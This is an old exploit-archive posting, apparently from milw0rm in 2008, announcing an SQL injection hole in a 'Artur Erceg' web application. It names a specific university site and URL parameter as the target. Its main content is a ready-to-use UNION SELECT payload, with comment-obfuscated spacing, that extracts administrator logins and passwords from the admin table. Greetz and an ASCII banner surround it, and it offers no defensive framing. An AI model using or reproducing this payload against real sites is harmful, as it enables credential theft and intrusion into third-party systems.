_ ___ ___ _ | | / _ \ / _ \ | | _ __ ___ __| | ___| | | | | | | __| | ___ | '__/ _ \/ _` |/ __| | | | | | |/ _` |/ _ \ | | | __/ (_| | (__| |_| | |_| | (_| | __/ |_| \___|\__,_|\___|\___/ \___/ \__,_|\___| #**********************************************************************************# [+] [+] [+] "Artur Erceg" SQL Injection Vulnerbility [+] [+] [+] [+] [+] #**********************************************************************************# [+] AUTHOR: redc00de [+] Email: redc00de@googlemail.com [+] SITE/FRIENDS: http://khg-crew.ws/ [+] Injection path: http://www.pravst.hr/fakultet.php?p=0&s=[INJECTON] [+] Example: http://www.pravst.hr/fakultet.php?p=0&s=-9999/**/union/**/all/**/select/**/1,2,null,4,concat(login,char(58),pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/**/from/**/admin-- [+] EXPLOIT: ######################################################################################################################################### =-9999/**/union/**/all/**/select/**/1,2,null,4,concat(login,char(58),pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/**/from/**/admin-- ########################################################################################################################################## #**********************************************************************************# [+] [+] [+] GREETZ: #AlbaniaN-[H], #Milw0rm & #All My Friends [+] [+] [+] [+] [+] [+] #**********************************************************************************# [+] Republic oF Kosova [+] [+] Viva U.S.A [+] # milw0rm.com [2008-07-05]